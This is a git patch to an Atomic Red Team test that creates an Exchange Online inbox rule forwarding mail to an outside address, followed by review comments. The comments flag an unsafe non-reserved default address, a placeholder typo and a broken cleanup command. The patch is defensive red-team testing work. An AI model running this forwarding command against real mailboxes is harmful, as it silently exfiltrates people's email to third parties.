From 52bf96f19784276fe0559c0404e91d65382e3bd2 Mon Sep 17 00:00:00 2001
From: Justin Schoenfeld
Date: Thu, 5 Jan 2023 09:43:34 -0500
Subject: [PATCH] Implement option email forwarding address
---
 atomics/T1114.003/T1114.003.yaml | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/atomics/T1114.003/T1114.003.yaml b/atomics/T1114.003/T1114.003.yaml
index e74f5cf4..73d188da 100644
--- a/atomics/T1114.003/T1114.003.yaml
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -20,6 +20,10 @@ atomic_tests:
 description: email rule name
 type: String
 default: "Atomic Red Team Email Rule"
+ forwarding_email:
+ description: email rule name
+ type: String
+ default: "Atomic_Operator@at0mic.com"
 dependency_executor_name: powershell
 dependencies:
 - description: |
@@ -36,11 +40,11 @@ atomic_tests:
 $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
 Connect-ExchangeOnline -Credential $creds
- New-InboxRule -Name "#{rule_name}" -ForwardTo 'Atomic_Operator@example.com'
+ New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
 cleanup_command: |
 $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
 Connect-ExchangeOnline -Credential $creds
 Get-InboxRule | Where-Object { $_.Name -eq "#{rule_name}" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
 name: powershell
- elevation_required: false
\ No newline at end of file
+ elevation_required: false
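Review bot: The new `forwarding_email` argument in the first hunk defaults to `Atomic_Operator@at0mic.com`, whereas the hard-coded address it replaces used the reserved `example.com` domain. If `at0mic.com` is a registrable domain outside the tester's control, running the test with defaults would forward real mailbox content to a third party. I would keep a reserved-domain default such as `default: "Atomic_Operator@example.com"`, or state in the description that the value must be overridden with an address the tester controls. The description is also copied from `rule_name` and should read something like `description: destination email address for the forwarding rule`. The `input_arguments` block starts above this hunk.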
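Review bot: The placeholder in the added `New-InboxRule` line of the second hunk is written `{#forwarding_email}`, but every other argument here uses the `#{name}` form (`#{password}`, `#{username}`, `#{rule_name}`), so the value will presumably not be substituted and the literal string is passed to `-ForwardTo`. It should be `New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"`. Separately, the unchanged `cleanup_command` line `Where-Object { $_.Name -eq "#{rule_name}" | ForEach-Object {` appears to be missing the closing `}` of the `Where-Object` script block. If cleanup fails to parse, the forwarding rule stays on the mailbox after the test, so it is worth fixing in the same change. The test definition starts above this hunk.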